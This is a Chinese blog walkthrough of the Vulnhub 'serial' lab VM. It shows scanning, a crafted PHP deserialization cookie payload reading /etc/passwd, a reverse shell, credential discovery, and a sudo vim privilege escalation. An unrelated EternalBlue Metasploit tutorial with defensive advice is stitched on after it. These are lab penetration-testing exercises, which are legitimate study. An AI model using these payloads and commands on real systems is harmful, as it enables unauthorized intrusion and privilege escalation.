Vulnhubserial靶机复现

Linux靶机渗透实验全过程

先下载靶机:https://download.vulnhub.com/serial/serial.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.13.1-254

根据对比可知serial的一个ip地址为192.168.13.141
该靶机开启了22端口和80端口

目录扫描

dirb http://192.168.13.141

发现一个可访问网站,尝试访问一下

发现一个zip文件
下载看看

对该zip压缩包进行一个解压

解压出3份php文件,看看内容

index.php文件中包含user.class.php文件且对cookie中的user参数进行了序列化和base64编码

log.class.php定义了Log类和成员变量type_log且handler函数对变量进行了文件包含和输出

user.class.php文件包含log.class.php文件且定义了Welcome和User两个类并调用了log.class.php文件中的handler函数

访问原网站,用Burpsuite抓包查看cookie

由刚才三个文件可知这是base64编码

得到O:4:"User":2:{s:10:".User.name";s:3:"sk4";s:9:".User.wel";O:7:"Welcome":0:{}}7

构造payload,尝试读取passwd文件

O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}

使用base64编码将Burp抓的包发送到repeater模块修改cookie,得到passwd可知可登录系统用户除了root,还有sk4

获取shell
在本地构造一个payload

写入到一个php文件中

访问1.php文件

获得一个base64编码

更换抓包的cookie进行测试

命令执行成功

在Kali开启一个监听

反弹shell

没有回应,但反弹成功

提权

查看系统版本,内核版本

四处翻翻

在根目录下找到一个txt.bak文件

查看

获得了sk4的登录账号和密码
因为之前扫出来有22端口开放

使用远程连接

登陆成功

提权
sudo vim -c ':!/bin/sh'

提权成功

### 环境搭建与配置 为了成功复现 EternalBlue 漏洞,首先需要准备好实验环境。靶机选择 **Windows 7** 系统,IP 地址为 `192.168.244.133`;攻击机使用 **Kali Linux**,IP 地址为 `192.168.244.136`。所需工具包括 `nmap` 和 `metasploit-framework (MSF)`,这些工具默认集成在 Kali 系统中[^1]。 #### 靶机准备 - 安装 Windows 7 系统,并确保未安装补丁 KB4012598(该补丁修复了 MS17-010 漏洞)。 - 关闭防火墙或允许 SMB 协议通过。 - 确保系统开启了文件共享功能,SMB 服务运行正常。 #### 攻击机准备 - 安装 Kali Linux 并更新系统。 - 安装 Metasploit Framework,可通过命令 `sudo apt install metasploit-framework` 进行安装。 - 确认 nmap 已安装,用于网络扫描和端口探测。 ### 使用 Metasploit 复现 EternalBlue 漏洞 #### 启动 Metasploit Framework 打开终端并输入以下命令启动 Metasploit: ```bash msfconsole ``` 进入 Metasploit 控制台后,输出信息显示当前版本及模块数量,如下所示: ``` =[ metasploit v6.3.27-dev ] + -- --=[ 2335 exploits - 1220 auxiliary - 413 post ] + -- --=[ 1385 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] ``` #### 搜索 EternalBlue 模块 在 Metasploit 控制台中执行以下命令搜索相关模块: ```bash search eternalblue ``` 系统将列出多个与 EternalBlue 相关的模块,例如 `exploit/windows/smb/ms17_010_eternalblue`。选择该模块进行漏洞利用: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` #### 设置目标与负载 查看模块所需的参数: ```bash show options ``` 主要需要设置以下参数: - `RHOSTS`: 靶机 IP 地址,即 `192.168.244.133` - `LHOST`: 攻击机 IP 地址,即 `192.168.244.136` 设置参数命令如下: ```bash set RHOSTS 192.168.244.133 set LHOST 192.168.244.136 ``` 默认情况下,模块会使用合适的 payload,如 `windows/x64/meterpreter/reverse_tcp`。若需更改 payload,可使用 `set payload` 命令指定。 #### 执行漏洞利用 完成所有设置后,执行漏洞利用: ```bash exploit ``` 如果一切顺利,Metasploit 将尝试连接靶机并通过 SMB 协议发送恶意数据包,最终获得 Meterpreter 会话。 #### 成功获取 Meterpreter 会话 一旦漏洞利用成功,控制台将显示 Meterpreter 提示符,表示已成功获取目标系统的控制权。此时可以执行多种操作,如上传文件、执行命令等。 ```bash meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` 上述结果显示当前权限为 `NT AUTHORITY\SYSTEM`,即最高权限,说明漏洞利用成功。 ### 注意事项与防御建议 - **测试环境隔离**:确保实验环境与生产网络隔离,避免误伤真实系统。 - **漏洞修复**:微软已于 2017 年发布补丁 KB4012598 修复此漏洞。对于实际环境中未打补丁的系统,应尽快安装官方补丁。 - **SMB 协议防护**:企业网络中应限制 SMB 协议的外部访问,关闭不必要的共享服务,启用防火墙规则阻止非法 SMB 请求。 - **入侵检测**:部署 IDS/IPS 系统,监控异常 SMB 流量,及时发现类似 EternalBlue 的攻击行为。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值